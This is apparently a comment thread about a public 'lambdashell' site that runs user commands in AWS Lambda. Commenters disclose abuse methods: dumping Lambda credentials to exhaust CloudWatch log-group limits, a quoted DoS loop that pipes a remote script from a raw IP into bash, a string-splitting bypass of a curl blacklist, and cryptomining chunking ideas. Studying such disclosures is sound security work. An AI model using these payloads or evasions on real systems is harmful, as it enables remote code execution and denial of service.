Not necessarily a security vulnerability per se, but I was able to fill up the AWS account with CloudWatch log groups by doing the following:
1. Run "env | grep AWS" to dump the temporary credentials.
2. Export those creds locally where you have the CLI installed. They'll work for at least 15-30 minutes depending on the IAM config.
3. Run "aws sts get-caller-identity" to see the role info, which seems to imply it has the default Lambda basic execution policy. That policy includes the "logs:CreateLogGroup" permission, which means you can then run "aws logs create-log-group --log-group-name <anything>".
Repeat x5000 and hit the AWS limit for log groups in an account. This isn't necessarily a security risk in and of itself, but it could cause issues if anything else were running in the account that needs logs, or could prevent new services from spinning up.
Not a security issue, but you're appending LAMBDA_TASK_ROOT to PATH inside the handler, which means it gets appended again on every invocation of a warm container. Move the PATH modification outside the handler function so it only happens once.
It's also probably wise to "return" the "context.done" callbacks in the try/catch so it doesn't double-callback, or otherwise get rid of that last TODO "context.done" call.
I'm not sure I grasp the reason that every command entered is stored in localStorage and echoed in the console, and that xss.js file is looking a little suspicious.
Exactly, it allows your function to cache state between executions if that state won't fit in RAM (/tmp gives you 512MB). I use this to cache objects from S3 so I can avoid the latency of a round-trip for popular objects.
Yes. It's a common trick to speed up execution. If you have to download a big chunk of data to make your lambda work, you download it to /tmp, and then when you run you first check for it there.
So you can download and cache some resources locally, then reuse them on the next call while the function instance is still alive (20 to 40 minutes based on my tests).
I'm not going to be much help. I'm not too sure what you would exploit. Trying to escape the Amazon API through some kind of VM escape seems pretty hard, and I guess it would get you a much bigger bounty from Amazon. Maybe use the auth keys to access the accounts?
Am I correct in thinking that the box the site is running on is completely different from the one the console is on? Is index.js a clue?
Anyway, to more easily see what everyone else is doing, run grab_commands() from the browser console.
Author of lambdashell here - that is not the code. You can see the actual code by just doing 'cat index.js'. This is, as the website states, a default lambda function doing an exec() - really, really simple.
They are just functions - but Node lets you run external scripts. The relevant bit of source (you can view it all with cat index.js) is:
```
const result = childProcess.execSync(event.body.command).toString();
console.log(result);
var response = {result: result};
context.done(null, response);
```
So it's not really a shell itself, but every time you send a command on the website it runs it, returns you the response, and the website adds that response to its shell GUI.
I don't really understand how this is serverless if you are still connecting to a remote terminal. There has to be some kind of service to receive the connection through a TCP port. To me the term serverless suggests execution on the local computer without transmission.
The idea of "serverless" is that you don't have to manually provision and manage servers yourself. You just provide the code you want to run and the service handles the rest for you. From the developer's point of view, there's no "server" they need to deal with. (although there is actually a real server in there somewhere, of course)
When I think of serverless I think of an application that runs on the desktop, in the browser, or in WASM. The generated data is stored in the same place the application is run. The only distribution is the initial delivery of the application. Not only is that confined to one side of a network, no network is required at all.
I suppose the reason I have trouble accepting this use of serverless is in the case of a connection interruption. If the connection goes down the application is killed, which sounds like a service availability failure to me.
It is not connected to a remote terminal in the normal way. It is just a terminal-styled page, where your input is sent to a Lambda running Node.js that runs your command using childProcess.execSync(command).
I don't expect there to be any obvious privesc or interesting vulnerability... I'm curious to know what benmanns might have found, though.
If there is one, the author is quite cheeky, since that could allow him to crowdsource an AWS bug bounty :)
That said, getting RCE is usually really interesting because you can get access to the secrets and sensitive data that the app needs to run, but this app doesn't need anything interesting to run (besides the AWS token, which can only log to CloudWatch). This means that the only resources it's using are the compute and network itself.
The most obvious way to exploit this, would then be to mine cryptocurrencies, which won't be trivial due to the 3s task limit. It would still be doable by splitting the work into chunks doable in 3s, and making the payload re-entrant, just like the "curl DoS" that the author is currently attempting to block.
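The re-entrant chunking idea can be sketched as below. This is a hedged illustration of the scheme, not anything from the site: `step` and `resubmit` are hypothetical stand-ins for one unit of work and for POSTing the remaining state back to the API as a fresh command.

```javascript
// Do a bounded slice of work, then hand serialized state to a fresh
// invocation before the ~3s task limit kills this one.
function workChunk(state, step, budgetMs, resubmit) {
  const deadline = Date.now() + budgetMs;
  while (!state.done && Date.now() < deadline) {
    state = step(state); // one small, interruptible unit of work
  }
  if (!state.done) {
    // Out of budget: re-enter by submitting the remaining state
    // as a brand-new command.
    resubmit(JSON.stringify(state));
  }
  return state;
}
```

Each invocation stays under the limit, and the work as a whole keeps crawling forward - which is exactly why it looks so similar to the DoS loop.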
In fact, a hidden cryptominer and a DoS both have the goal of maximizing resource usage :)
I noticed the "curl DoS" since now any curl command will fail due to the check that returns "blocking curl due to people just using it for stupid DoS - yes this is ghetto: will re-enable once I find a better method"
The payload is:

```
for i in $(seq 1 2);
do
  #echo 1 &
  curl -v -X POST -H 'Content-Type: application/json' -d '{command: "curl 13.230.227.99/fk | bash"}' https://yypnj3yzaa.execute-api.us-west-1.amazonaws.com/dev &
done
```
Obviously, that's not enough to prevent such a DoS from happening: you can just recreate the curl string at runtime.
e.g. `$(echo cu)rl http://httpbin.org/ip` still works. We could also use JavaScript and parametrize the payload with a random key (a server could easily pick a different one on every request). The only way to detect it would then be to decode it by actually running the JavaScript, and even that still leaves you exposed to HTTP requests made directly via Node's http module.
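A toy illustration of why this kind of substring blacklist fails (the check shown is my guess at the shape of the filter, not the site's actual code): the shell reassembles "curl" at runtime, so the filter never sees the string it's looking for.

```javascript
// Naive blacklist: reject any command containing the literal string "curl".
const looksLikeCurl = (cmd) => cmd.includes('curl');

console.log(looksLikeCurl('curl http://httpbin.org/ip'));          // true: caught
console.log(looksLikeCurl('$(echo cu)rl http://httpbin.org/ip'));  // false: sails through
```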
All great points. Also realizing that it’s pretty easy to bypass my simple check, but I needed something to temporarily pause the loop. I want to allow curl completely, as it's part of the default exec environment, but I don’t know of a good way to prevent the basic DDoS. Any ideas?
Any issues found, I will recommend the finder submit directly to Amazon - I will not be doing so myself. Also, I will be adding a section to the site showing issues found so far, with credit to the finders.
This is because the instance is constantly being destroyed and rebuilt, I'm not sure what the timeout is exactly, but it's not long. Reverse shells die within 2-3 seconds.